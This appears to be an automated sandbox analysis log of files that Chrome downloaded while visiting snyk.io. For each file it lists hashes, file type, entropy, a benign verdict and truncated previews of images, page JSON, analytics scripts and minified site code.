                                                                                                                                                                                                                                                                                                              SSDEEP:3072:qNvzNivUb9ecmHpwbr2DH6/BDPrrL/UxB2:qprm2bEH+BXrmQ
                                                                                                                                                                                                                                                                                                              MD5:B31F80A5F775565D3ED1BD2C6B6E9040
                                                                                                                                                                                                                                                                                                              SHA1:175AE442F6DCD451F33F80BE0750999688FCBDB6
                                                                                                                                                                                                                                                                                                              SHA-256:ABF89A4D28B343D49E517FB6288A307E8A7E4ADB56F83E32E4D9E71E404CBFFE
                                                                                                                                                                                                                                                                                                              SHA-512:F0D69C01DC0EDD53A0C4CBA57C1A4F9420708D6619F7A0ACEBAB05D911725A92CBC909ED18B4489FE0A4E2BFFD8D95E8FBDFF147C01567F28C303F833D73E783
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1686142464%2Fillustration-ui-spot-snyk-deepcode-hybrid-accuracy.png&w=960&q=75
                                                                                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8X...........e..ALPH......'$H..xkD..9...#....f.....H..D...%K..2i......v.Q...H-.-..C.~..@....jQv..R.tX....T3.@|...e..L%?..m....$.....Y.i...m.m.m....c.{.Q..{..>..?.....}.....-I.%I.m...y.|.|......mf]*.T..!.2.*.<&.V...........u?.OUu..k23..'.@H. A..]X.X..]./,...,....!....$..q....|........O#.?.............1dYXk..O.e.i.-.......lOsq..[....M.}.DJ...Ok..+.>..4..i.JV.9...b=.t.v..a.X/.t.h...g.<.}.6..-.e}0Y..^....4.>X..z5u..G....r:.......LnY....DW.}..x.... B..O......a....>.z..^..y.....>..3i;......\.2.q..kaY/.Z/.'L..L.7..t./........\.......F,.....4ad.J...........Z...".]g.=2....~C*[.YM........i.{-.K......p.c..{e..0...=0.c..W..c.4._.........nV.u..Y..V.9k.......m.d-LWn.F....{]>...5..v.._..8u.M...]..+..h-]y.m-k4..j.o$i..cZ].L.e.`.........-*.y.....W[X.....+.?.i..UVN+.4u...........7.[l.it;.g......`Z.-..i.G0....(....`_.`..0..........w..F...hEyf.=.....f..Y[..A.\....k...ih.X........Y9*....Y...en...7;g....k..wl..n]...a5..,...]11.v.....v.}.a1.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (61451), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):61492
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.13067928793062
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:qAKnN5uyffCgsPj4qKms7EMVvpxl+fm9re9PE8waMe:lKN5uqs0HTXr9faMe
                                                                                                                                                                                                                                                                                                              MD5:5620D76FC3A2081C068E2BD382252F19
                                                                                                                                                                                                                                                                                                              SHA1:3FCA793460268822CD564A3DCB7408A97563F012
                                                                                                                                                                                                                                                                                                              SHA-256:343C2B526F139CA56DE0BFB32F7A481A6681A82F6659C85BEA63BBA02D697114
                                                                                                                                                                                                                                                                                                              SHA-512:08EB534040339695FA63F2124FE013A48103A10CBC5931C9DCE4973872B37D8F957044819B2FF76C706B4CD2AD069F6E2A6EA18D2B6F3ABB8B5EEC7953AEB2A6
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/snyk-ambassadors.json?slug=snyk-ambassadors
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6Em0p3H7LGi8YxdfABF5XP","type":"Entry","createdAt":"2022-11-10T18:03:38.782Z","updatedAt":"2023-06-28T18:22:05.240Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":41,"revision":11,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Community - Snyk Ambassadors page","title":"Snyk Ambassador Program | Snyk","slug":"snyk-ambassadors","uri":"snyk-ambassadors","featuredImage":[{"url":"http://res.cloudinary.com/snyk/image/upload/v1628807053/wordpress-sync/ambassadors-program.png","tags":[],"type":"upload","bytes":265659,"width":1200,"format":"png","height":628,"context":{"custom":{"guid":"96ee64c864c26b844f1998974734a5f1","caption":"ambassadors-program","cld_wp_plugin":"1"}},"version":1628807053,"duration":null,"metadata":[]
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):813
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.156399074128828
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:n5ndskw4IrZa2quJZVe0WJarMquD1IKAqEMXKto3IkRWZvJZy:5dsIwZYuJqgrgD1pKq3IkRWZvJZy
                                                                                                                                                                                                                                                                                                              MD5:1504BEF206821DB8382F43094B84A3FE
                                                                                                                                                                                                                                                                                                              SHA1:54835A21D8FE5D2E8F6AF92144D0CA5E6699F0F4
                                                                                                                                                                                                                                                                                                              SHA-256:7B720BCA62DFA1C26BE9A32896B24449344BF86440FC06AF3FA2A15752F2B3DD
                                                                                                                                                                                                                                                                                                              SHA-512:FFF0C6133C72CE3D41CED9B1269CC38B864694F0C1383F39667E67348C2EC4E1380723039EDE0D61493A05B74EB3CA5E84A0C600D07FCD98272101C723B90D28
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:UET_ID = typeof document !== 'undefined' ? document?.querySelector('script[id="trd-flame-load"]')?.getAttribute('data-id') : null;.if (UET_ID) {..// console.log('Microsoft (Bing/UET) Advertising Remarketing Running');..(function (w, d, t, r, u) {...var f, n, i;...(w[u] = w[u] || []),....(f = function () {.....var o = {......ti: UET_ID,.....};.....(o.q = w[u]), (w[u] = new UET(o)), w[u].push('pageLoad');....}),....(n = d.createElement(t)),....(n.src = r),....(n.async = 1),....(n.onload = n.onreadystatechange =.....function () {......var s = this.readyState;......(s && s !== 'loaded' && s !== 'complete') || (f(), (n.onload = n.onreadystatechange = null));.....}),....(i = d.getElementsByTagName(t)[0]),....i.parentNode.insertBefore(n, i);..})(window, document, 'script', '//bat.bing.com/bat.js', 'uetq');.}.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):4217
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.278431400922646
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:RlN8NPssoFm8boZJToVprFhtHH7TkccP9M/bE0EWLlnLQEjKEUPnd71Tu1+yyP57:7NEXhBoVprJnPkLVcfnL8vd71q1+yyR
                                                                                                                                                                                                                                                                                                              MD5:2053C2DE3DBA4CED20108C506D6A8342
                                                                                                                                                                                                                                                                                                              SHA1:293464D848ADAF7AB8FDFE7C1239256D90F11197
                                                                                                                                                                                                                                                                                                              SHA-256:A1814E1FD4BB08755374B6EFB763FD8D86375F53B8A9CC0D482113A6DFE5DEC6
                                                                                                                                                                                                                                                                                                              SHA-512:8F269BCC841C28E58A81FC82C275F2DCB72106C9229CD4BCC2D0A55E152B6244FB820F0E6B1E5703C8C6CF4913C835BD630070DDA132CB21849D960DF8378E3A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/v1663720680/wordpress-sync/logo-afterpay.svg
                                                                                                                                                                                                                                                                                                              Preview:<svg width="226" height="80" viewBox="0 0 226 80" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_220_2238)">.<path d="M221.878 27.1037L215.101 23.226L208.227 19.2895C203.684 16.6848 198.004 19.9554 198.004 25.204V26.0853C198.004 26.5749 198.259 27.0253 198.69 27.2604L201.882 29.0817C202.763 29.5909 203.86 28.9446 203.86 27.9262V25.8307C203.86 24.7927 204.976 24.1464 205.877 24.6556L212.144 28.2592L218.392 31.8431C219.292 32.3523 219.292 33.6645 218.392 34.1736L212.144 37.7576L205.877 41.3611C204.976 41.8703 203.86 41.224 203.86 40.186V39.1481C203.86 33.8995 198.18 30.6093 193.637 33.2336L186.763 37.1701L179.987 41.0478C175.423 43.6721 175.423 50.272 179.987 52.8963L186.763 56.774L193.637 60.7105C198.18 63.3152 203.86 60.0446 203.86 54.796V53.9147C203.86 53.4251 203.605 52.9746 203.174 52.7396L199.982 50.9183C199.101 50.4091 198.004 51.0554 198.004 52.0738V54.1693C198.004 55.2073 196.888 55.8536 195.987 55.3444L189.72 51.7408L183.473 48.1569C182.572 47.6477 182
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65437), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):99963
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.125042166860923
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:hP3L1SK2rD1FQHe3e+ViE5fesgSyeOnbjhFPxK6WrViXr9faMe:5L1r2r3EOli2hTyrPPxT+
                                                                                                                                                                                                                                                                                                              MD5:4E74F2F90F4E90D2C60822799086BA18
                                                                                                                                                                                                                                                                                                              SHA1:0B1BDCF6C9FA93B698BFA095973B769A63919340
                                                                                                                                                                                                                                                                                                              SHA-256:23E50288CC54DD68293281DF46191677910DAC4C00BBDB61F9DE4C70308E11C1
                                                                                                                                                                                                                                                                                                              SHA-512:3E7688E6321CB890035AE1A78A299D2E4B23E062B25FF967830BDAD1517ED0651794CBBE0A72E30438DDBB26F469E81A4E8568900787D0F440F838967778F613
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3ckk2zk6oSP4x1GCh4x8OH","type":"Entry","createdAt":"2022-11-09T18:37:58.686Z","updatedAt":"2023-09-23T16:40:20.922Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":39,"revision":11,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Products - Platform page","title":"Snyk Developer Security Platform | Snyk","slug":"platform","uri":"platform","pageLocalization":["de","fr","ja","pt-BR"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"1ZqqtMkx9v2jtAEzGbCQqZ","type":"Entry","createdAt":"2022-11-09T18:37:58.778Z","updatedAt":"2024-07-18T22:31:05.463Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publis
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65476), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):73635
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.084714370515501
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:/hlpnHLylhKbgESpRoYC8gJlnpazNP00t+R6lmPdEMVvpxl+fm9re9PE8waMe:/zpHLyPNESppGJoPzQSmpXr9faMe
                                                                                                                                                                                                                                                                                                              MD5:93B0DCDE13D4C738580DAA17462EC13A
                                                                                                                                                                                                                                                                                                              SHA1:20EF972E862D354615E991DD83024FCB332DFB46
                                                                                                                                                                                                                                                                                                              SHA-256:908A9CF828A59BD4964053ADF5C24C9E8397AC5EFB2E92BB9FDE196BDFC61E88
                                                                                                                                                                                                                                                                                                              SHA-512:AF8CE63A2866BDEEF5A9EF4817B0ADBAB7CBE771CD82ADEB1FBA920BBD84ED8B279BA7B624DB89BF6AC435ED97D576F60F7FC47E39A077218D46CAE31D88A3F6
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6XgXGIlyIMBLxBpv6Lq9oE","type":"Entry","createdAt":"2022-12-08T16:11:17.016Z","updatedAt":"2023-06-13T20:42:10.317Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":43,"revision":13,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateCodeChecker"}},"locale":"en-US"},"fields":{"internalName":"\"Code Checker\"","title":"Code Checker | Free Code Security Tool Powered by AI | Snyk","slug":"/","pageLocalization":["de","fr","ja"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2FMuZI18CtjHdoqd0HpGsH","type":"Entry","createdAt":"2022-12-05T12:06:05.120Z","updatedAt":"2023-06-13T20:33:22.052Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":25,"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (6105), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):6105
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.238378421291859
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:+EZXcOEW5zT8xq8dJbmgMHByoFvvkU/zOv3qBQvSboMt+ssGV0aOGstBvp:kW5z/cmJBy4zOv3qSKBL2aO/
                                                                                                                                                                                                                                                                                                              MD5:D74CC4825C8E333B2116DA3FCC649DB1
                                                                                                                                                                                                                                                                                                              SHA1:B48D09A14C1CD6333F1D2D811675B771F2A38A00
                                                                                                                                                                                                                                                                                                              SHA-256:4A007AF67F716C30C8848AB0AD0BFAAB8A5FCF3E36DEDF918B59C9429D522440
                                                                                                                                                                                                                                                                                                              SHA-512:FBAD39A642A7AF5167B8F1AB37510B83817CD90E19C3286CA6B76A1CC8C383E45216C1C8F8A03A10916C21960FF625F67A059017ABD5834F17B2BC9E41CCB4C8
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://scout-cdn.salesloft.com/sl.js
                                                                                                                                                                                                                                                                                                              Preview:!function(t){function e(i){if(n[i])return n[i].exports;var o=n[i]={i:i,l:!1,exports:{}};return t[i].call(o.exports,o,o.exports,e),o.l=!0,o.exports}var n={};e.m=t,e.c=n,e.i=function(t){return t},e.d=function(t,n,i){e.o(t,n)||Object.defineProperty(t,n,{configurable:!1,enumerable:!0,get:i})},e.n=function(t){var n=t&&t.__esModule?function(){return t.default}:function(){return t};return e.d(n,"a",n),n},e.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},e.p="",e(e.s=5)}([function(t,e,n){"use strict";Object.defineProperty(e,"__esModule",{value:!0});var i={get:function(t){for(var e=t+"=",n=decodeURIComponent(document.cookie),i=n.split(";"),o=0;o<i.length;o++){var u=i[o].trim();if(0==u.indexOf(e))return u.substring(e.length,u.length)}return null},set:function(t,e,n){var i=new Date;i.setTime(i.getTime()+24*n*60*60*1e3);var o="expires="+i.toUTCString();document.cookie=t+"="+e+";"+o+";path=/"}};e.default=i},function(t,e,n){"use strict";function i(t,e){var n=new XMLHttpRequest;n.on
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (9671), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):9671
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.311369519927307
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:ThtXcnC4AlvGQkvbq7wy3NEp/HSIoC7JSzvHWsbgwR3NJ6:ThtXcyRovbq7wXp/yIdJkHrgqP6
                                                                                                                                                                                                                                                                                                              MD5:7342546A5D5F4F44C1F41779B7D84698
                                                                                                                                                                                                                                                                                                              SHA1:98284045050F411A3DFB1E0CADB576EC5A45B314
                                                                                                                                                                                                                                                                                                              SHA-256:6EB02D1AD74B33784271ED5F4E820C7B046031E3852A9C5984E145FB778D8FF3
                                                                                                                                                                                                                                                                                                              SHA-512:00D229C72A129A7758D59618DD654BB96F1FC27145AE8B556001A123CAB89471941C0452AAF5E9571BAEF7568B68B23D82152F21380AEEBDF21DCB9C29E80FAF
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/9875.8b3ce8ccbc1ad2ec.js
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9875],{73359:function(l,i,e){e.d(i,{Z:function(){return r}});var o=e(85893),n=e(45697),d=e.n(n),a=e(44133);function t(l){let{label:i,className:e}=l;return(0,o.jsx)("span",{className:(0,a.Z)("badge",e),"data-component":"Badge",children:i})}t.propTypes={label:d().string,type:d().string,className:d().string};var r=t},1789:function(l,i,e){e.d(i,{Z:function(){return u}});var o=e(85893),n=e(45697),d=e.n(n),a=e(73359),t=e(24982),r=e(44133),s=e(15020);function v(l){let{badge:i,isAnimated:e,message:n,url:d}=l;return(0,o.jsxs)("div",{className:(0,r.Z)("announcement-bar group",e&&"animated fly-in-bottom"),"data-component":"Announcement Bar",children:[(null==i?void 0:i.label)&&(0,o.jsx)(a.Z,{label:null==i?void 0:i.label}),(0,o.jsx)(t.Z,{href:d,className:(0,r.Z)("announcement-link link-arrow link-stretched"),children:n})]})}v.propTypes={badge:d().exact({...a.Z.propTypes}),colorScheme:d().oneOf(s.z7),isAnimated:d().bool,message:d(
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (32012)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):203665
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.507397133059363
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:5i/bgBBN4g71je7Ph8kSUR1p8OldwwYL2u3DDU8CuqjmMtI:0kBcWjkPmdUFCeu3DDU8Cuqjmp
                                                                                                                                                                                                                                                                                                              MD5:85061C1AF76DAB9F734EF1831BB8FA63
                                                                                                                                                                                                                                                                                                              SHA1:98006E980FD5A1A7F2475D5227EA38EBC5692708
                                                                                                                                                                                                                                                                                                              SHA-256:0602C4FB1597B7E6E111FE79777E195CACBC73774FCAF233A7835B33372DCEAE
                                                                                                                                                                                                                                                                                                              SHA-512:EAA04331E0019E04AB41D13839E5476363A523C669908816237DCA34F4E2ABFE34302299DFD858559DE642BCC919DA09817BD5DD0842D47FACCAD36BA373ABBC
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://go.snyk.io/js/forms2/js/forms2.min.js
                                                                                                                                                                                                                                                                                                              Preview:/*! forms2 2024-08-28 See forms2.js for license info */.!function a(b,c,d){function e(g,h){if(!c[g]){if(!b[g]){var i="function"==typeof require&&require;if(!h&&i)return i(g,!0);if(f)return f(g,!0);var j=new Error("Cannot find module '"+g+"'");throw j.code="MODULE_NOT_FOUND",j}var k=c[g]={exports:{}};b[g][0].call(k.exports,function(a){var c=b[g][1][a];return e(c?c:a)},k,k.exports,a,b,c,d)}return c[g].exports}for(var f="function"==typeof require&&require,g=0;g<d.length;g++)e(d[g]);return e}({1:[function(a,b,c){var d="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";!function(a){"use strict";function b(a){var b=a.charCodeAt(0);return b===g||b===l?62:b===h||b===m?63:i>b?-1:i+10>b?b-i+26+26:k+26>b?b-k:j+26>b?b-j+26:void 0}function c(a){function c(a){j[l++]=a}var d,e,g,h,i,j;if(a.length%4>0)throw new Error("Invalid string. Length must be a multiple of 4");var k=a.length;i="="===a.charAt(k-2)?2:"="===a.charAt(k-1)?1:0,j=new f(3*a.length/4-i),g=i>0?a.length-4:a.length;var l=0
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (52774), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):52801
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.156130274941792
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:HGVCFAraTGxZYqaWta6nz6Yz6IXr9faMe:rPTGxCwa6nz6Yz65
                                                                                                                                                                                                                                                                                                              MD5:4CD50FABACA5F5B45295317631D2549E
                                                                                                                                                                                                                                                                                                              SHA1:09CCF594D739383661B73118EC72008B3503201C
                                                                                                                                                                                                                                                                                                              SHA-256:CB374FF7D74F32A16E5285C7C64226F3F94BDAC2233090D53C9C2E0859732A3F
                                                                                                                                                                                                                                                                                                              SHA-512:77BF821564FB25E1C95A34D202CE0D6568B128D9C801179EF80D01787EF037279DFC8E7C582FADBD370FC2DAD71D6F350186C8505D66B1924F66B3F858B03D1A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/partners.json?slug=partners
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4ojF8pVreaLJSKD1xYv2cm","type":"Entry","createdAt":"2022-11-14T23:11:00.049Z","updatedAt":"2024-05-01T11:45:05.832Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":31,"revision":7,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Partners page","title":"Partners | Snyk","slug":"partners","uri":"partners","pageLocalization":["de","fr","ja"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2JTyW3vAim4oZISP1PswGm","type":"Entry","createdAt":"2022-11-14T23:11:10.649Z","updatedAt":"2023-04-11T21:19:50.319Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":13,"revision":4,"contentType":{"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):48
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.381328385912463
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:YRKOAzSU0n6SUKdrEEn:YYWUZKh
                                                                                                                                                                                                                                                                                                              MD5:92EA6146BC45B7E0DA69966101EFD05B
                                                                                                                                                                                                                                                                                                              SHA1:52B06FB98AC221E90928775581F2E50DC08C49BA
                                                                                                                                                                                                                                                                                                              SHA-256:C3852C5482B87A1E2E941E0CF5D9AE2180D792232E7DBC12C96FC2E0EF1CD2B4
                                                                                                                                                                                                                                                                                                              SHA-512:7B422874DB961D93CC2122DA972E4870C908833271EC349555800DC6BD4D1C0BF2FA26ABE68E68A8515BF34050CA853808A945F2B18B109F7240C2BA2C75BE08
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"token":"7dda5b93-75c6-474d-b851-3e6861fdaa04"}
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (5358), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):5358
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.15794501559416
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:z6ALCF6wluWf/FwmqoFQvheRJzh3L+tl/HfEjyBphE:nO1oA/amqqQvERRh3wxfEjwpe
                                                                                                                                                                                                                                                                                                              MD5:10A12F623813AABD1075D8A47B163938
                                                                                                                                                                                                                                                                                                              SHA1:FAC20E8DBC5BB8CD708336AB512775CD8F3A7E1D
                                                                                                                                                                                                                                                                                                              SHA-256:249AECBC75DEE49C57BD16D643E273DA5110B4020BA80C4A2209A24D258E77D5
                                                                                                                                                                                                                                                                                                              SHA-512:B4CFD3F603FE9955C2266B7881784BE7400624ACB0E1BB00EC21A341C6B59A6DBD90F3505397EA1E420C3DF4B3A0E583FA072061813CB5D6355CCB051CEDABB5
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/1751.f8f467cbaf47e698.js
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1751],{81751:function(i,l,o){o.r(l),o.d(l,{default:function(){return I}});var d=o(85893),n=o(45697),e=o.n(n),v=o(96098),t=o(15020);function u(i){let{section:l,colorScheme:o,children:n=[]}=i;return(0,d.jsx)(v.Z,{...l,colorScheme:o,"data-component":"River Layout",children:(0,d.jsx)("div",{className:"d-flex flex-col gap-huge",children:n})})}u.propTypes={section:e().shape(v.Z.propTypes),children:e().arrayOf(e().element),colorScheme:e().oneOf(t.z7)};var r=o(5152),s=o.n(r),a=o(9981),c=o(23751);let p=s()(()=>o.e(3886).then(o.bind(o,83886)),{loadableGenerated:{webpack:()=>[83886]}}),f=s()(()=>Promise.all([o.e(5030),o.e(6936)]).then(o.bind(o,16936)),{loadableGenerated:{webpack:()=>[16936]}}),h=s()(()=>Promise.all([o.e(4098),o.e(169)]).then(o.bind(o,10169)),{loadableGenerated:{webpack:()=>[10169]}});function y(i){var l,o,n,e,v,t;let{component:u,settings:r}=i,s=(0,c.bU)(),{sys:y,fields:b}=u,m={moleculeTextFeatureGrid:p,molecule
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (6259), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):6259
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.305841730217248
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:+tRzMPexs+3ng+XcLKzY5rysZ4Oaqb6XueVKy8tOVN77ndrqKhjt:WsmnMKcV/Zv+AfSNHdWKv
                                                                                                                                                                                                                                                                                                              MD5:1CCCD9C8380E466698D1CBB982D779B5
                                                                                                                                                                                                                                                                                                              SHA1:42C0A7672FF6487D5639D752E3AAE64A0CF280CA
                                                                                                                                                                                                                                                                                                              SHA-256:C2155C205DD65A6A13D22C7804B8A8FF077235FCC1C7FE5F3EF6ADC840CD6AD5
                                                                                                                                                                                                                                                                                                              SHA-512:63003DAB09254179216AD274300931F302490CDE6F07EEA82615A5FC1F8EC44B9715B07684D081F61226636699446BE0EC9EC4A64762ABCFFD10B6AA7301E4EC
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
